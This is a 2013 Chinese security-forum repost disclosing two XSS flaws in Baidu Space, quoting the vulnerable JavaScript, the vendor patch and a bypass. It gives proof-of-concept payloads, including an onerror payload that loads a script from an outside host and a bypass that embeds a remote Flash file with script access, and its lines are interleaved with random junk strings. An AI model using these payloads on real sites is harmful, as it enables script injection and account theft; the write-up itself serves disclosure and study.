中国网络渗透测试联盟
标题:
hi.baidu Xss 漏洞
[打印本页]
作者:
admin
时间:
2013-8-24 11:51
标题:
hi.baidu Xss 漏洞
百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
1 }3 w& U! b+ B) ~% \% m: E& v
! ^ U3 k; o8 ^
1.在
http://hi.baidu.com/p__z/modify/sppet
中,用户可以输入留言管理,提交后,未过滤直接储存.
1 K! P* W0 a& A
2.在
http://hi.baidu.com/ui/scripts/pet/pet.js
中
x. ^; ~% l& o9 Y3 J, c9 _
% `8 r6 c' d' f" Q6 M. Q" k
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
* w* g" V2 N1 w; y% y
其中BdUtil.insertWBR为
# k- y- H- X8 `7 d4 g- y
function(text, step) {
; r. b: K5 c9 ?
var textarea = textAreaCache || getContainer();
( T; i/ L; G9 b" p$ s& }( _# P
if (!textarea) {
" G- _% E9 T! L* h" W3 d4 V: J6 D
return text;
3 _, g* ^9 ~4 q
}
$ O. F0 D! v! x
textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">");
0 P! V/ c$ ` `6 d
var string = textarea.value;
0 {! V1 D7 N6 o4 S+ B9 Z6 \4 K, A# n
var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
. b( n: w: L; ]! M$ p& [
var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;");
* Y5 A6 N7 Q, D0 `- i; D! e5 K m8 E
return result;
+ q& m+ X% X1 f, o
}
! s$ L) X6 D% U% X3 D
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS.
2 `- v f: R, Z* \/ R
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>
* u" S' k2 G" i& m% Q: O
7 O! y8 Q# {- E$ g6 m8 ]
二:creatbgmusic() Dom-Xss Bug
- A h2 P1 E8 c! [6 X8 h; [
百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
( V# u2 r7 K, t1 w; h
: ~) v# q8 l1 d5 e% E6 I6 z/ i, G
在
http://hi.baidu.com//js/bgmusic.js?v=1.0.js
代码:
9 B2 J' k2 D4 b5 a; `
; Z6 q2 W; c0 A L
function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) {
0 j" F2 a! D/ K! J
//传入的murl赋值到bgmusic1和bgmusic2中
, ]4 ~4 z- L- |2 `
//可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1
9 f. ]) Z s7 A D7 J* ^
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">";
" d8 M% s7 ]. }! ]5 F
if (musicnum <= 1) {
6 b% y& q) j" q( H/ j$ j, [( _
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">";
' E3 @# ^, a4 V$ p' U1 k. x8 A9 j
}
7 {& f5 h7 A- P9 V; p$ S
bgmusic1 += "</OBJECT>";
2 I; i( {4 {# X
var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";
0 r5 q2 a8 Q" V
if (musicnum <= 1) {
3 c' M# t$ f8 {- X
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
% a* X; S. g x+ y- X! K
}
4 F! o, y2 |' u' X5 i* M1 n/ g( f
bgmusic2 += "> </EMBED>";
: u+ S) a0 Q E" K# O; q: e" d8 \6 j
var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
1 {/ q% }; O1 x/ w# a
var bgmus = detectWMP();
% c) {0 m) c3 R: j; y1 X
if (functype == "FckMusicHelper") {
4 T& r' H& v, K6 @7 |8 W
if (bgmus.installed) {
: u1 Y% ^0 c# {# l: ~3 s+ e4 L% T
if (bgmus.type == "IE") {
% |" c6 w& u. `) E$ b$ f
return bgmusic1;
# L6 L+ T, X3 r( B
} else if (bgmus.type == "NS") {
* C* Y) w1 U( A* k
return bgmusic2;
; ?; S2 S/ R! h
}
4 P7 D9 \! s# h$ a; Y
} else {
; e. B- H) b- t: F' B4 j4 C9 @
return bgmusic3;
2 E' @* g; A+ A& X) Y
}
7 H: z: j+ M! }; n$ K, |$ e9 o7 o
} else {
% g4 F S0 I* @( ]+ G# o1 n! a3 ?& S0 [
if (bgmus.installed) {
7 s2 ?2 F4 h5 f$ M1 W. S' b
//document.write 直接输出bgmusic变量 导致xss
% S8 ^* y# [/ p8 n* a$ G' S
if (bgmus.type == "IE") {
9 K8 N& i! z* f9 q
document.write(bgmusic1);
- o: K0 {2 D7 |# p$ s' }) H
} else if (bgmus.type == "NS") {
' w8 H7 Y; D% B- p
document.write(bgmusic2);
5 {1 v8 Q' b" @( O O' T
}
9 u% Y) t/ d5 e8 u: }) ?) e
} else {
, c v. s4 N& A5 X1 U- Q V3 R }
document.write(bgmusic3);
* C4 s. s& p$ |2 B9 y$ \% z* C1 N
}
+ W) w% B7 S- E0 d5 ~+ A. g& O
return "";
( Y0 ~3 Z2 `% A: X9 m
}
& z& H7 g T& x5 B
}
: X' K7 x: O2 p/ b8 t- Z' b* K9 @! W
% B2 a; l1 e: w) s/ g9 W1 U5 x
在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:
. Q6 l6 m$ k- J0 B+ `5 v: I
- K/ g" h" w, Q* [! i+ d
function initBlogTextForFCK(){
/ h) } M3 L5 a: o. h
//fck init music
' K/ w' m$ u$ D3 U( C
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
3 q: g$ K5 R4 T2 v+ @/ m, G
var imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组
& W$ g/ R- I, d c) s w
var isAutoPlay=true;
) K; _6 l$ n3 ^7 `( f. B" \
for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历.
* {$ ~; T% K7 ] `0 M
var img=imgBox;
7 s( ?" r* q3 N# N# @3 u1 X9 k
if(img.getAttribute(’rel’)){
( B* |: z+ L3 ^: N0 Z9 `
var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc
. C6 Y. l" `" m4 y3 u0 w8 C3 y
var musicDiv = document.createElement("SPAN");
+ Q+ v, s9 i3 }
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
! B! r# h$ L- w
) F; y) z! f* B
..........................
8 D' L$ \+ G1 m: `8 a4 z) Z* C7 Q" g
' K2 t- H: C, ~; }
//直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
% Z" Q3 h8 U, Z; Y7 _( j4 q
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
/ i) S: {+ I" ]
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv);
0 z% h% A3 @: t" V2 ^! f
musicDiv.innerHTML=shtml;
5 h; K: ]- \$ g- f; ~' l$ B
i--;n--;
/ @0 n3 {! g2 H. X& l
}
2 f8 i4 N7 k- j" Q ~, i- C D( u
}
9 [& g$ [( g. h3 S. w5 Y
: ]6 s8 ^; ~2 d1 `( ~
从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
- d+ g+ g" ^5 q
, G N' Z0 Q* g( w# k8 V! B6 d; w
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
+ B9 F8 p9 X5 y
) d& t: M6 O1 E9 R+ ~- L9 R
等待官方补丁
; U+ K2 t; w8 U) ]9 q% K! i9 U% q
6 a$ x: s4 D9 I) z$ d
update 2010年5月13日
5 }& i5 E" H6 J+ i1 b
, |* ^ O, s2 T( G2 C
官方补丁:
5 K% ?6 z* u, S' D8 u
1 g' L, q7 V# s1 h' r
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
& c' l! r# ~2 N8 M/ g
改为:
" v: |5 \: m+ e) [0 n3 r
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
+ X/ i/ k* v# Y8 Q. Y! Q3 }4 b1 v
* Z; U @! z* Y$ {# T5 J
update 2010年5月13日 21:50:37
: {4 L% T2 p# k+ Z- K: ^% c$ k4 r
! o# a7 O p+ T& j2 N
补丁存在漏洞 没有过滤" 可以继续跨:
) v g+ T4 J, ]4 k7 d: I2 ^2 @
- ?( Y& ]6 s2 `( Y8 o$ N
NEW POC:
' l1 P( R' `* j- r+ i+ Z
# R- h1 T( \8 n4 m2 l& z& @
<img width="200" height="45" _fcksavedurl="
http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif
" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’
http://www.xsser.net/pz/js.swf
"
- R& u7 h$ i! f) U M* i
6 j8 W! F4 ?8 q2 k3 w
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>
- L7 r( l) A1 x
) U: ^3 L& K/ L6 q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2